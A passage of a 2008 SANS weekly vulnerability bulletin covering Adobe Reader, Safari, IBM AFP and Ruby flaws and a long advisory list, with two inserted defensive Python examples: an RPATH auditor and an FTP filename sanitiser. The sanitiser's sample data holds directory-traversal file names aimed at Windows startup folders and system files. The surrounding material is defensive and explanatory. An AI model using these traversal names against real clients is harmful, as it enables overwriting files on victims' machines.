RISK: The Consensus Security Vulnerability Alert Vol. 7 No. 26

From: The SANS Institute (ConsensusSecurityVulnerabilityAlert@sans.org)
Date: Thu Jun 26 2008 - 20:40:10 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

If you were wondering how people's PCs get infected (actually), look no
further than the PDF (Adobe Reader) flaw. PDF documents may get opened
without prompting the user. Then they take over the system. Also two
new remote code execution flaws in Apple Safari.
                                  Alan
*************************************************************************
         RISK: The Consensus Security Vulnerability Alert
June 26, 2008 Vol. 7 Week 26
*************************************************************************
RISK is the SANS community's consensus bulletin summarizing the most
important vulnerabilities and exploits identified during the past week
and providing guidance on appropriate actions to protect your systems
(PART I). It also includes a comprehensive list of all new
vulnerabilities discovered in the past week (PART II).

Summary of Updates and Vulnerabilities in this Consensus

Platform                                  Number of Updates and Vulnerabilities
----------------------------------------  -------------------------------------
Other Microsoft Products                  1
Third Party Windows Apps                  4 (#2, #3)
Mac Os                                    1
Linux                                     1
BSD                                       1
Unix                                      1
Cross Platform                            17 (#1, #4)
Web Application - Cross Site Scripting    16
Web Application - SQL Injection           39
Web Application                           48

*************************************************************************
TRAINING SCHEDULE UPDATE
- SANSFIRE 2008 in Washington DC (7/22-7/31) SANS' biggest summer program
      http://www.sans.org/sansfire08/
- Canberra (6/30-7/5) http://www.sans.org/canberra08/
- Singapore (6/30-7/5) http://www.sans.org/singapore08/
- Boston (8/9-8/17) http://www.sans.org/boston08/
- Virginia Beach (8/21-8/29) http://www.sans.org/vabeach08/
Plus 100 other cities and online any time: www.sans.org
*************************************************************************

Table Of Contents
Part I -- Critical Vulnerabilities from TippingPoint (www.tippingpoint.com)
Widely Deployed Software
(1) CRITICAL: Adobe Acrobat JavaScript Remote Code Execution
(2) HIGH: Apple Safari Multiple Vulnerabilities
(3) HIGH: IBM AFP Viewer Plugin Buffer Overflow
(4) MODERATE: Ruby Multiple Vulnerabilities

Part II -- Comprehensive List of Newly Discovered Vulnerabilities from
Qualys (www.qualys.com)
 -- Other Microsoft Products
08.26.1 - Microsoft Visual Basic Enterprise Edition 6 "vb6skit.dll" Remote Buffer Overflow
 -- Third Party Windows Apps
08.26.2 - UltraEdit FTP/SFTP "LIST" Command Directory Traversal
08.26.3 - WISE-FTP FTP Client "LIST" Command Directory Traversal
08.26.4 - World in Conflict NULL Pointer Remote Denial of Service
08.26.5 - SunAge Multiple Denial of Service Vulnerabilities
 -- Mac Os
08.26.6 - Apple Mac OS X AppleScript ARDAgent Shell Local Privilege Escalation
 -- Linux
08.26.7 - Red Hat SBLIM Insecure Library Path Local Privilege Escalation
 -- BSD
08.26.8 - OpenBSD GNU Screen Locked Authentication Bypass
 -- Unix
08.26.9 - TMSNC UBX Message Remote Buffer Overflow
 -- Cross Platform
08.26.10 - SurgeMail IMAP Command Unspecified Denial of Service
08.26.11 - OFFSystem HTTP Headers Remote Buffer Overflow
08.26.12 - Cisco Intrusion Prevention System (IPS) Platforms Inline Mode Denial of Service
08.26.13 - Mozilla Firefox 3 Unspecified Buffer Overflow
08.26.14 - PHP "chdir()" and "ftok()" "safe_mode" Multiple Security Bypass Vulnerabilities
08.26.15 - PHP 5 "posix_access()" Function "safe_mode" Bypass Directory Traversal Vulnerability
08.26.16 - Mozilla Firefox Unspecified Remote Code Execution
08.26.17 - PHP "rfc822_write_address()" Function Buffer Overflow
08.26.18 - Apple Safari Automatic File Launch Remote Code Execution
08.26.19 - Apple Safari WebKit JavaScript Arrays Remote Buffer Overflow
08.26.20 - Classic FTP "LIST" Command Directory Traversal
08.26.21 - Multiple XnView Products TAAC File Buffer Overflow
08.26.22 - JSCAPE Secure FTP Applet Host Key Validation Security Bypass
08.26.23 - Perl "rmtree()" Function Local Insecure Permissions
08.26.24 - Ruby Multiple Unspecified Arbitrary Code Execution Vulnerabilities
08.26.25 - Mozilla Firefox Unspecified Arbitrary File Access Weakness
08.26.26 - Adobe Acrobat and Reader "JavaScript" Method Remote Code Execution
 -- Web Application - Cross Site Scripting
08.26.27 - CGIWrap Error Page Handling Cross-Site Scripting
08.26.28 - TYPO3 DCD GoogleMap Extension Unspecified Cross-Site Scripting
08.26.29 - vBulletin Moderation Control Panel "redirect" Parameter Cross-Site Scripting
08.26.30 - Novell eDirectory iMonitor Unspecified Cross-Site Scripting
08.26.31 - Traindepot Local File Include and Cross-Site Scripting Vulnerabilities
08.26.32 - TYPO3 JobControl Extension Unspecified Cross-Site Scripting
08.26.33 - MindTouch DekiWiki Search Cross-Site Scripting
08.26.34 - TYPO3 Resource Library Extension Unspecified Cross-Site Scripting
08.26.35 - GL-SH Deaf Forum Cross-Site Scripting Vulnerability and Arbitrary File Upload
08.26.36 - JaxUltraBB Cross-Site Scripting and Local File Include Vulnerabilities
08.26.37 - PEGames Multiple Cross-Site Scripting Vulnerabilities
08.26.38 - Chipmunk Blog "membername" Parameter Multiple Cross-Site Scripting Vulnerabilities
08.26.39 - HTML Purifier CSS Multiple Cross-Site Scripting Vulnerabilities
08.26.40 - Trabajando Multiple Cross-Site Scripting Vulnerabilities
08.26.41 - TinX/cms Cross-Site Scripting and Local File Include Vulnerabilities
08.26.42 - MM Chat Remote File Include and Multiple Cross-Site Scripting Vulnerabilities
 -- Web Application - SQL Injection
08.26.43 - Easy Webstore "index.php" SQL Injection
08.26.44 - KEIL Software photokorn "index.php" SQL Injection
08.26.45 - Samart-cms "site.php" SQL Injection
08.26.46 - CMS-BRD "index.php" SQL Injection
08.26.47 - TYPO3 Diocese of Portsmouth Calendar Today Extension SQL Injection
08.26.48 - TYPO3 CoolURI Extension SQL Injection
08.26.49 - TYPO3 Diocese of Portsmouth Training Courses Extension SQL Injection
08.26.50 - TYPO3 TIMTAB - Social Bookmark Icons Extension SQL Injection
08.26.51 - TYPO3 Fussballtippspiel Extension SQL Injection
08.26.52 - TYPO3 Download System Extension SQL Injection
08.26.53 - TYPO3 Random Prayer Extension SQL Injection
08.26.54 - EroCMS "site" parameter SQL Injection
08.26.55 - TorrentTrader Classic Edition Multiple SQL Injection Vulnerabilities
08.26.56 - MyBizz-Classifieds "index.php" SQL Injection
08.26.57 - MaxTrade Trade Module SQL Injection
08.26.58 - BoatScripts Classifieds "type" Parameter SQL Injection
08.26.59 - Carscripts Classifieds "index.php" SQL Injection
08.26.60 - CaupoShop "csc_article_details.php" SQL Injection
08.26.61 - AJ Auction Pro "cate_id" Parameter SQL Injection
08.26.62 - AJ Auction "id" Parameter SQL Injection
08.26.63 - CiBlog "links-extern.php" SQL Injection
08.26.64 - emuCMS "index.php" SQL Injection
08.26.65 - PHPAuction "profile.php" SQL Injection
08.26.66 - Ektron CMS400.NET "ContentRatingGraph.aspx" SQL Injection
08.26.67 - CMS Multiple SQL Injection Vulnerabilities
08.26.68 - KbLance.com "index.php" SQL Injection
08.26.69 - Online Fantasy Football League Multiple SQL Injection Vulnerabilities
08.26.70 - Scientific Image DataBase "projects.php" SQL Injection
08.26.71 - AJ HYIP Acme "news.php" SQL Injection
08.26.72 - phpAuction "item.php" SQL Injection
08.26.73 - EXP Shop Joomla! "com_expshop" Component SQL Injection
08.26.74 - PageSquid CMS "index.php" SQL Injection
08.26.75 - sHibby sHop "default.asp" SQL Injection
08.26.76 - CCleague Pro "u" Cookie Parameter SQL Injection
08.26.77 - IGSuite "formid" Parameter SQL Injection
08.26.78 - HoMaP-CMS "index.php" SQL Injection
08.26.79 - Relative Real Estate Systems "listing_id" Parameter SQL Injection
08.26.80 - ShareCMS Multiple SQL Injection Vulnerabilities
08.26.81 - DUcalendar "detail.asp" SQL Injection
 -- Web Application
08.26.82 - nweb2fax Multiple Remote Vulnerabilities
08.26.83 - Drupal TrailScout Module SQL Injection and HTML Injection Vulnerabilities
08.26.84 - eLineStudio Site Composer Multiple Input Validation and Unauthorized Access Vulnerabilities
08.26.85 - Academic Web Tools CMS 1.4.2.8 Multiple Input Validation Vulnerabilities
08.26.86 - OwnRS "clanek.php" Multiple Input Validation Vulnerabilities
08.26.87 - Orlando CMS classes "GLOBALS["preloc"]" Parameter Multiple Remote File Include Vulnerabilities
08.26.88 - TYPO3 TARGET-E WorldCup Bets Extension Multiple Unspecified Input Validation Vulnerabilities
08.26.89 - WebCalendar "tools/send_reminders.php" Remote File Include
08.26.90 - ManageEngine OpUtils "hostName" HTML Injection
08.26.91 - CRE Loaded Multiple HTML Injection Vulnerabilities
08.26.92 - Exero CMS "theme" Parameter Multiple Local File Include Vulnerabilities
08.26.93 - doITlive CMS Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
08.26.94 - aspWebCalendar "calendar_admin.asp" Arbitrary File Upload
08.26.95 - TYPO3 nepa-design.de Spam Protection Extension Unspecified Setting Manipulation
08.26.96 - TYPO3 Frontend Filemanager Extension Unspecified Code Execution
08.26.97 - Lotus Core CMS "phpbb_root_path" Parameter Multiple Remote File Include Vulnerabilities
08.26.98 - EZTechhelp Company EZCMS Multiple Unspecified Vulnerabilities
08.26.99 - Virtual Support Office-XP Multiple Remote Vulnerabilities
08.26.100 - FireAnt "index.php" Local File Include
08.26.101 - IPTBB "act" Parameter Local File Include
08.26.102 - FubarForum "index.php" Local File Include
08.26.103 - Lightweight News Portal Multiple Input Validation and Authentication Bypass Vulnerabilities
08.26.104 - Diigo Toolbar and Diigolet Comment Feature HTML Injection and Information Disclosure Vulnerabilities
08.26.105 - Jamroom "purchase.php" Remote File Include
08.26.106 - Aprox CMS Engine "index.php" Local File Include
08.26.107 - IDMOS "site_absolute_path" Parameter Multiple Remote File Include Vulnerabilities
08.26.108 - le.cms "admin/upload.php" Arbitrary File Upload
08.26.109 - CCleague Pro "type" Cookie Parameter Authentication Bypass
08.26.110 - le.cms "submit0" Parameter Authentication Bypass
08.26.111 - RSS-aggregator "display.php" Remote File Include
08.26.112 - MiGCMS Multiple Remote File Include Vulnerabilities
08.26.113 - HoMaP "plugin_admin.php" Remote File Include
08.26.114 - phpDMCA Multiple Remote File Include Vulnerabilities
08.26.115 - Open Digital Assets Repository System Remote File Include
08.26.116 - benja CMS Multiple Input Validation and Unauthorized Access Vulnerabilities
08.26.117 - J00lean-CMS "includes/classes/page.php" Unspecified Remote Vulnerability
08.26.118 - CMS Mini "view/index.php" Multiple Local File Include Vulnerabilities
08.26.119 - CMReams Cross-Site Scripting and Local File Include Vulnerabilities
08.26.120 - emuCMS "upload.php" Arbitrary File Upload
08.26.121 - BlogPHP "email" Parameter Privilege Escalation
08.26.122 - MyBlog Cross-Site Scripting and SQL Injection Vulnerabilities
08.26.123 - Joomla! and Mambo FacileForms Component "ff_compath" Parameter Remote File Include
08.26.124 - Dagger "skins/default.php" Remote File Include
08.26.125 - Ourvideo CMS Multiple Input Validation Vulnerabilities
08.26.126 - cmsWorks "lib.module.php" Remote File Include
08.26.127 - cmsWorks "config.php" Arbitrary File Upload
08.26.128 - A+ PHP Scripts News Management System Multiple Input Validation Vulnerabilities
08.26.129 - Php F1 Max's Image Uploader "index.php" Arbitrary File Upload

______________________________________________________________________

PART I Critical Vulnerabilities
Part I for this issue has been compiled by Rob King at TippingPoint, a
division of 3Com, as a by-product of that company's continuous effort
to ensure that its intrusion prevention products effectively block
exploits using known vulnerabilities. TippingPoint's analysis is
complemented by input from a council of security managers from twelve
large organizations who confidentially share with SANS the specific
actions they have taken to protect their systems. A detailed description
of the process may be found at
http://www.sans.org/newsletters/cva/#process

*****************************
Widely Deployed Software
*****************************

(1) CRITICAL: Adobe Acrobat JavaScript Remote Code Execution
Affected:
Adobe Reader versions 8.1.2 and prior
Adobe Acrobat versions 8.1.2 and prior

Description: Acrobat and Reader are Adobe's Portable Document Format
(PDF) viewers. They contain a flaw in their handling of certain
JavaScript constructs. A PDF document containing embedded JavaScript
could trigger this flaw, creating a buffer overflow condition.
Successfully exploiting this buffer overflow would allow an attacker to
execute arbitrary code with the privileges of the current user. Note
that, depending upon configuration, PDF documents may be opened by the
vulnerable applications upon receipt without first prompting the user.
Reports indicate that this vulnerability is being actively exploited in
the wild.

Status: Vendor confirmed, updates available.

References:
Adobe Security Advisory
http://www.adobe.com/support/security/bulletins/apsb08-15.html
Wikipedia Article on the Portable Document Format
http://en.wikipedia.org/wiki/Portable_Document_Format
SecurityFocus BID
http://www.securityfocus.com/bid/29908

**************************************************

(2) HIGH: Apple Safari Multiple Vulnerabilities
Affected:
Apple Safari 3.1.1 and prior for Microsoft Windows.

Description: Safari, Apple's web browser for Mac OS X and Microsoft
Windows, contains multiple vulnerabilities in its handling of a variety
of inputs. Two vulnerabilities can result in remote code execution. The
first of these has to do with a logic flaw in Safari's handling of user
preferences. Safari reads part of its configuration from Microsoft
Internet Explorer's configuration; certain combinations of these
settings can result in automatic execution of downloaded files. Note
that Safari is not vulnerable in the default configuration for sites not
in Internet Explorer's "Local" zone. Additionally, a buffer overflow
exists in Safari's handling of JavaScript arrays. A specially crafted
JavaScript script could trigger this overflow, allowing an attacker to
execute arbitrary code with the privileges of the current user. Note
that technical details of this vulnerability may be publicly available
via source code analysis.

Status: Vendor confirmed, updates available. Note that only Safari for
Microsoft Windows is affected.

References:
US-CERT Vulnerability Note
http://www.kb.cert.org/vuls/id/127185
Safari Home Page
http://www.apple.com/safari/
SecurityFocus BIDs
http://www.securityfocus.com/bid/29835
http://www.securityfocus.com/bid/29836

**************************************************

(3) HIGH: IBM AFP Viewer Plugin Buffer Overflow
Affected:
IBM AFP Viewer Plugin versions prior to 3.4.1.7

Description: Advanced Function Presentation (AFP) is a document
presentation system. It is widely used with IBM products. The AFP Viewer
Plugin allows users to view AFP documents from a web browser. This
plugin contains a buffer overflow vulnerability in its handling of
certain inputs. A specially crafted web page that uses this plugin could
trigger this vulnerability. Successfully exploiting this vulnerability
would allow an attacker to execute arbitrary code with the privileges
of the current user. Technical details for this vulnerability are
publicly available.

Status: Vendor confirmed, updates available.

References:
Secunia Security Advisory
http://secunia.com/advisories/27995/
Product Download Page
http://www-1.ibm.com/support/docview.wss?rs=95&context=SRNPPZ&q=psd1*&uid=psd1P4000233
Wikipedia Article on AFP
http://en.wikipedia.org/wiki/Advanced_Function_Presentation
SecurityFocus BID
http://www.securityfocus.com/bid/29932

**************************************************

(4) MODERATE: Ruby Multiple Vulnerabilities
Affected:
Ruby versions 1.8.7-p21 and prior

Description: Ruby is a popular scripting and programming language. It
contains multiple flaws in certain functions. If these functions are
used to process user input, an attacker could trigger one of these
flaws. Successfully exploiting one of these flaws would allow an
attacker to execute arbitrary code with the privileges of the vulnerable
process. Note that technical details for these vulnerabilities are
available via source code analysis.

Status: Vendor confirmed, updates available.

References:
Ruby Security Advisory
http://www.ruby-lang.org/en/news/2008/06/20/arbitrary-code-execution-vulnerabilities/
Ruby Home Page
http://www.ruby-lang.org/en/
SecurityFocus BID
http://www.securityfocus.com/bid/29903

**********************************************************

Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 26, 2008
This list is compiled by Qualys (www.qualys.com) as part of that
company's ongoing effort to ensure its vulnerability management web
service tests for all known vulnerabilities that can be scanned. As of
this week Qualys scans for 5549 unique vulnerabilities. For this special
SANS community listing, Qualys also includes vulnerabilities that cannot
be scanned remotely.

______________________________________________________________________

08.26.1 CVE: Not Available
Platform: Other Microsoft Products
Title: Microsoft Visual Basic Enterprise Edition 6 "vb6skit.dll"
Remote Buffer Overflow
Description: Microsoft Visual Basic Enterprise Edition 6 is a
development platform for building applications for Microsoft Windows
operating systems. The application is exposed to a stack-based buffer
overflow issue because it fails to perform adequate size checks on
user-supplied input. Microsoft Visual Basic Enterprise Edition 6 SP6
is affected.
Ref: http://www.securityfocus.com/bid/29792
______________________________________________________________________

08.26.2 CVE: Not Available
Platform: Third Party Windows Apps
Title: UltraEdit FTP/SFTP "LIST" Command Directory Traversal
Description: UltraEdit is a text, HTML and HEX editor available for
Microsoft Windows. The application contains an FTP/SFTP browser. The
application is exposed to a directory traversal issue because it fails
to sufficiently sanitize user-supplied input. This issue occurs in the
FTP/SFTP client. Specifically, the application fails to sanitize
directory-traversal strings included in the "LIST" command. UltraEdit
version 14.00b is affected.
Ref: http://vuln.sg/ultraedit1400b-en.html
______________________________________________________________________

08.26.3 CVE: Not Available
Platform: Third Party Windows Apps
Title: WISE-FTP FTP Client "LIST" Command Directory Traversal
Description: WISE-FTP is an FTP client application for Microsoft
Windows. The application is exposed to a directory traversal issue
because it fails to sufficiently sanitize user-supplied input. This
issue occurs in the FTP client. WISE-FTP versions prior to 5.5.9 are
affected.
Ref: http://vuln.sg/wiseftp558-en.html
______________________________________________________________________

08.26.4 CVE: Not Available
Platform: Third Party Windows Apps
Title: World in Conflict NULL Pointer Remote Denial of Service
Description: World in Conflict is a real-time strategy (RTS) game
available for Microsoft Windows. The application is exposed to a
remote denial of service issue because it fails to handle NULL-pointer
exceptions. World in Conflict version 1.008 is affected.
Ref: http://www.securityfocus.com/archive/1/493596
______________________________________________________________________

08.26.5 CVE: Not Available
Platform: Third Party Windows Apps
Title: SunAge Multiple Denial of Service Vulnerabilities
Description: SunAge is a real-time strategy game available for
Microsoft Windows systems. The application is exposed to
multiple denial of service issues. SunAge version 1.08.1 is affected.
Ref: http://aluigi.altervista.org/adv/sunagex-adv.txt
______________________________________________________________________

08.26.6 CVE: Not Available
Platform: Mac Os
Title: Apple Mac OS X AppleScript ARDAgent Shell Local Privilege
Escalation
Description: Mac OS X is exposed to a local privilege escalation issue
affecting ARDAgent (Apple Remote Desktop). ARDAgent is installed
setuid. When an AppleScript script is used to invoke ARDAgent, the
ARDAgent process does not drop privileges. Mac OS X version 10.5 is
affected.
Ref: http://it.slashdot.org/it/08/06/18/1919224.shtml
______________________________________________________________________

08.26.7 CVE: CVE-2008-1951
Platform: Linux
Title: Red Hat SBLIM Insecure Library Path Local Privilege Escalation
Description: SBLIM is an Open Source project intended to enhance the
manageability of GNU/Linux systems. The packages are exposed to a
local privilege escalation issue because they were built with insecure
library search paths: the RPATH (runtime library search path) in the
ELF (Executable and Linking Format) header of certain libraries points
to a world-writable temporary directory.
Ref: https://rhn.redhat.com/errata/RHSA-2008-0497.html
______________________________________________________________________
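The RPATH problem in 08.26.7 is easy to audit on any Linux host: `readelf -d` prints the DT_RPATH and DT_RUNPATH entries, and each directory in them should be checked for being empty, relative, under a temporary directory, missing, or world-writable. The script below is an added example written for this bulletin, not code from Qualys, Red Hat or the SBLIM project. The `readelf` output it parses is constructed, and `/tmp/example-build/lib` is an invented stand-in for the world-writable directory the advisory describes.

```python
import os
import re
import stat
import subprocess

# Constructed `readelf -d` output for a hypothetical binary. The /tmp path is an
# invented placeholder for the world-writable temporary directory in the advisory.
SAMPLE_READELF = """\
Dynamic section at offset 0x1d68 contains 27 entries:
  Tag        Type                         Name/Value
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]
 0x000000000000000f (RPATH)              Library rpath: [/tmp/example-build/lib:/usr/lib64:lib:]
 0x000000000000001d (RUNPATH)            Library runpath: [$ORIGIN/../lib]
"""

# Matches the RPATH / RUNPATH lines as readelf prints them.
SEARCH_PATH_RE = re.compile(r"\((?:RPATH|RUNPATH)\)\s+Library r(?:un)?path:\s+\[(.*)\]")
TEMP_PREFIXES = ("/tmp", "/var/tmp", "/dev/shm")


def parse_search_paths(readelf_output):
    """Return every directory named in DT_RPATH / DT_RUNPATH, in search order.

    Empty elements (leading, trailing or doubled colons) are kept because the
    dynamic loader treats them as the current working directory.
    """
    dirs = []
    for line in readelf_output.splitlines():
        m = SEARCH_PATH_RE.search(line)
        if m:
            dirs.extend(m.group(1).split(":"))
    return dirs


def classify_dir(path, is_world_writable=None):
    """Return a reason string if `path` is an unsafe library search path, else None.

    `is_world_writable` may be supplied by the caller (for offline use and tests);
    when it is None the directory is stat'ed on the local filesystem.
    """
    if path == "":
        return "empty entry: loader searches the current working directory"
    if path.startswith("$ORIGIN"):
        return None  # relative to the executable itself; fine if its directory is protected
    if not path.startswith("/"):
        return "relative path: resolved against the current working directory"
    if any(path == p or path.startswith(p + "/") for p in TEMP_PREFIXES):
        return "temporary directory: any local user can plant a library here"
    if is_world_writable is None:
        try:
            mode = os.stat(path).st_mode
        except OSError:
            return "directory missing: a local user may be able to create it"
        is_world_writable = bool(mode & stat.S_IWOTH)
    if is_world_writable:
        return "world-writable directory"
    return None


def audit_readelf_output(readelf_output, writable_lookup=None):
    """Map each unsafe search path to the reason it was flagged.

    `writable_lookup` (path -> bool) answers the world-writable question without
    touching the disk; paths not in it are stat'ed by classify_dir.
    """
    lookup = writable_lookup or {}
    findings = {}
    for d in parse_search_paths(readelf_output):
        reason = classify_dir(d, lookup.get(d))
        if reason:
            findings[d] = reason
    return findings


def audit_binary(path):
    """Audit a real ELF file on this host; requires binutils' readelf on PATH."""
    out = subprocess.run(["readelf", "-d", path], capture_output=True,
                         text=True, check=True).stdout
    return audit_readelf_output(out)


if __name__ == "__main__":
    for d, why in audit_readelf_output(SAMPLE_READELF, {"/usr/lib64": False}).items():
        print(f"{d!r}: {why}")
```

Run `audit_binary()` over the libraries and setuid binaries a package installs (for example by walking the RPM file list) to confirm a vendor fix actually rebuilt them with safe search paths.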

08.26.8 CVE: Not Available
Platform: BSD
Title: OpenBSD GNU Screen Locked Authentication Bypass
Description: GNU Screen is a window manager that allows users to
create and use multiple virtual consoles on one physical terminal. GNU
Screen for OpenBSD is exposed to an issue that allows local attackers
to bypass the locked screen password prompt. GNU Screen version 4.0.3
for OpenBSD 4.3 is affected.
Ref: http://www.securityfocus.com/bid/29810
______________________________________________________________________

08.26.9 CVE: Not Available
Platform: Unix
Title: TMSNC UBX Message Remote Buffer Overflow
Description: TMSNC is a command-line, text-only MSN messenger client
application available for Unix and Unix-like systems. The
application is exposed to a buffer overflow issue because it fails to
perform adequate boundary checks on user-supplied input. TMSNC version
0.3.2 is affected.
Ref: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=487222
______________________________________________________________________

08.26.10 CVE: Not Available
Platform: Cross Platform
Title: SurgeMail IMAP Command Unspecified Denial of Service
Description: SurgeMail is a mail server available for various
platforms. The application is exposed to a remote denial of service
issue due to an unspecified error when handling certain IMAP commands.
SurgeMail versions prior to 3.9g2 are affected.
Ref: http://www.netwinsite.com/surgemail/help/updates.htm
______________________________________________________________________

08.26.11 CVE: Not Available
Platform: Cross Platform
Title: OFFSystem HTTP Headers Remote Buffer Overflow
Description: Owner-Free Filesystem is a distributed file system. The
application is exposed to a buffer overflow issue because it fails to
perform adequate boundary checks on user-supplied data. The issue
occurs when parsing HTTP headers. OFFSystem versions up to 0.19.14 are
affected.
Ref: http://www.securityfocus.com/bid/29809
______________________________________________________________________

08.26.12 CVE: CVE-2008-2060
Platform: Cross Platform
Title: Cisco Intrusion Prevention System (IPS) Platforms Inline Mode
Denial of Service
Description: Cisco Intrusion Prevention System (IPS) platforms are
designed to monitor network traffic for malicious activity and to
mitigate possible attacks. The application is exposed to a denial of
service issue when handling a specific series of jumbo Ethernet
frames. Cisco Intrusion Prevention System versions prior to 5.1(8)E2
and 6.0(5)E2 are affected.
Ref:
http://www.cisco.com/en/US/products/products_security_advisory09186a00809b3842.shtml
______________________________________________________________________

08.26.13 CVE: CVE-2008-2786
Platform: Cross Platform
Title: Mozilla Firefox 3 Unspecified Buffer Overflow
Description: Mozilla Firefox is a web browser available for multiple
platforms. The application is exposed to an unspecified buffer
overflow issue. An attacker can exploit this issue to execute
arbitrary code within the context of the affected application.
Ref:
http://lists.grok.org.uk/pipermail/full-disclosure/2008-June/062832.html
______________________________________________________________________

08.26.14 CVE: CVE-2008-2666
Platform: Cross Platform
Title: PHP "chdir()" and "ftok()" "safe_mode" Multiple Security Bypass
Vulnerabilities
Description: PHP is a general-purpose scripting language that is
especially suited for web development and can be embedded into HTML.
PHP is exposed to multiple "safe_mode" restriction bypass issues. PHP
version 5.2.6 is affected.
Ref: http://securityreason.com/achievement_securityalert/55
______________________________________________________________________

08.26.15 CVE: CVE-2008-2665
Platform: Cross Platform
Title: PHP 5 "posix_access()" Function "safe_mode" Bypass Directory
Traversal Vulnerability
Description: PHP is a general-purpose scripting language that is
especially suited for web development and can be embedded into HTML.
The application is exposed to a directory traversal issue that affects
the "posix_access()" function. PHP version 5.2.6 is affected.
Ref: http://securityreason.com/achievement_securityalert/54
______________________________________________________________________

08.26.16 CVE: CVE-2008-2785
Platform: Cross Platform
Title: Mozilla Firefox Unspecified Remote Code Execution
Description: Mozilla Firefox is a web browser available for multiple
platforms. The application is exposed to an unspecified remote code
execution issue. Mozilla Firefox versions 3.0 and earlier are
affected.
Ref:
http://dvlabs.tippingpoint.com/blog/2008/06/18/vulnerability-in-mozilla-firefox-30
______________________________________________________________________

08.26.17 CVE: Not Available
Platform: Cross Platform
Title: PHP "rfc822_write_address()" Function Buffer Overflow
Description: PHP is a general-purpose scripting language that is
especially suited for web development and can be embedded into HTML.
The application is exposed to a buffer overflow issue because it fails
to perform boundary checks before copying user-supplied data to
insufficiently sized memory buffers. PHP versions 5.2.6 and earlier
are affected.
Ref: http://bugs.php.net/bug.php?id=42862
______________________________________________________________________

08.26.18 CVE: CVE-2008-2306
Platform: Cross Platform
Title: Apple Safari Automatic File Launch Remote Code Execution
Description: Apple Safari is a web browser available for Apple Mac OS X
and Microsoft Windows. The application is exposed to a remote code
execution issue because the application automatically launches
executable files when downloading from a web site. Apple Safari
versions prior to 3.1.2 running on Microsoft Windows XP and Windows
Vista are affected.
Ref: http://www.kb.cert.org/vuls/id/127185
______________________________________________________________________

08.26.19 CVE: CVE-2008-2307
Platform: Cross Platform
Title: Apple Safari WebKit JavaScript Arrays Remote Buffer Overflow
Description: WebKit is a browser framework used in the Apple Safari
browser and other applications. The application is exposed to a remote
buffer overflow issue because it fails to perform adequate boundary
checks when handling specially crafted JavaScript arrays.
Ref: http://www.securityfocus.com/bid/29836
______________________________________________________________________

08.26.20 CVE: Not Available
Platform: Cross Platform
Title: Classic FTP "LIST" Command Directory Traversal
Description: Classic FTP is an FTP client application for multiple
operating systems. The application is exposed to a directory traversal
issue because it fails to sufficiently sanitize user-supplied input.
This issue occurs in the FTP client. Classic FTP version 1.02 for
Microsoft Windows is affected.
Ref: http://vuln.sg/classicftp102-en.html
______________________________________________________________________
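Entries 08.26.2, 08.26.3 and 08.26.20 share one root cause: an FTP client takes the file names a server returns in its LIST response and uses them as local paths, so a name containing "../" or "..\" escapes the download directory. The defensive pattern is to treat the name field as untrusted and accept only a single plain path component before joining it under the download directory. The code below is an added example written for this bulletin, not code from any of the affected clients or from Qualys; the LIST response it parses is constructed, and the download directory name is arbitrary.

```python
import posixpath
import re
from pathlib import PurePosixPath

# Constructed UNIX-style LIST response (not taken from any of the advisories).
# Every byte of it, including the name field, is chosen by the remote server.
SAMPLE_LIST = (
    "-rw-r--r--   1 ftp ftp   1024 Jun 20 10:00 report.pdf\n"
    "-rw-r--r--   1 ftp ftp   2048 Jun 20 10:01 ../../../Users/victim/Startup/run.exe\n"
    "-rw-r--r--   1 ftp ftp   4096 Jun 20 10:02 ..\\..\\Windows\\evil.dll\n"
    "-rw-r--r--   1 ftp ftp    512 Jun 20 10:03 /etc/passwd\n"
    "-rw-r--r--   1 ftp ftp    512 Jun 20 10:04 notes.txt\x00.exe\n"
    "drwxr-xr-x   2 ftp ftp   4096 Jun 20 10:05 ..\n"
    "-rw-r--r--   1 ftp ftp    700 Jun 20 10:06 quarterly report (final).pdf\n"
)

DRIVE_RE = re.compile(r"^[A-Za-z]:")  # "C:foo" is drive-relative on Windows


def parse_list_names(listing):
    """Return the name field of each UNIX-style LIST line.

    The first eight whitespace-separated fields are mode, links, owner, group,
    size, month, day and time; everything after them is the name, which may
    itself contain spaces.
    """
    names = []
    for line in listing.splitlines():
        fields = line.split(None, 8)
        if len(fields) == 9:
            names.append(fields[8])
    return names


def safe_download_name(server_name):
    """Accept a server-supplied name only if it is a single plain path component.

    Returns the name unchanged when it is safe, otherwise None. Both separator
    styles are rejected because the affected clients run on Windows, where a
    backslash also separates directories.
    """
    if not server_name or not server_name.strip():
        return None
    if "\x00" in server_name:  # a NUL would truncate the path in C runtimes
        return None
    if "/" in server_name or "\\" in server_name:
        return None
    if server_name in (".", ".."):
        return None
    if DRIVE_RE.match(server_name):
        return None
    return server_name


def local_target(download_dir, server_name):
    """Return the local path the client may write to, or None if the name is rejected.

    After the component check, the joined path is normalised and required to
    sit directly under download_dir, so a bypass of safe_download_name would
    still be caught here.
    """
    name = safe_download_name(server_name)
    if name is None:
        return None
    root = PurePosixPath(download_dir)
    target = PurePosixPath(posixpath.normpath(str(root / name)))
    if target.parent != root:
        return None
    return str(target)


def plan_downloads(listing, download_dir):
    """Split a LIST response into accepted {name: local_path} and rejected [names]."""
    accepted, rejected = {}, []
    for name in parse_list_names(listing):
        target = local_target(download_dir, name)
        if target is None:
            rejected.append(name)
        else:
            accepted[name] = target
    return accepted, rejected


if __name__ == "__main__":
    ok, bad = plan_downloads(SAMPLE_LIST, "/home/user/Downloads")
    print("accepted:", ok)
    print("rejected:", bad)
```

The same check applies to names arriving via MLSD, NLST or SFTP readdir responses: whichever listing format a client parses, the name is server data and is never a path.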

08.26.21 CVE: CVE-2008-2427
Platform: Cross Platform
Title: Multiple XnView Products TAAC File Buffer Overflow
Description: XnView is an image viewing and converting application;
NConvert is a batch image file conversion application; GFL SDK is an
imaging library designed to read and write numerous image file formats.
The applications are exposed to a buffer overflow issue due to
insufficient boundary checking of user-supplied input in malicious image
files. Affected applications are: XnView Standard versions 1.70 and
1.93.6, XnView NConvert version 4.92, and XnView GFL SDK version 2.82.
Ref: http://www.securityfocus.com/archive/1/493505
______________________________________________________________________

08.26.22 CVE: Not Available
Platform: Cross Platform
Title: JSCAPE Secure FTP Applet Host Key Validation Security Bypass
Description: JSCAPE Secure FTP Applet is a secure FTP client. It runs
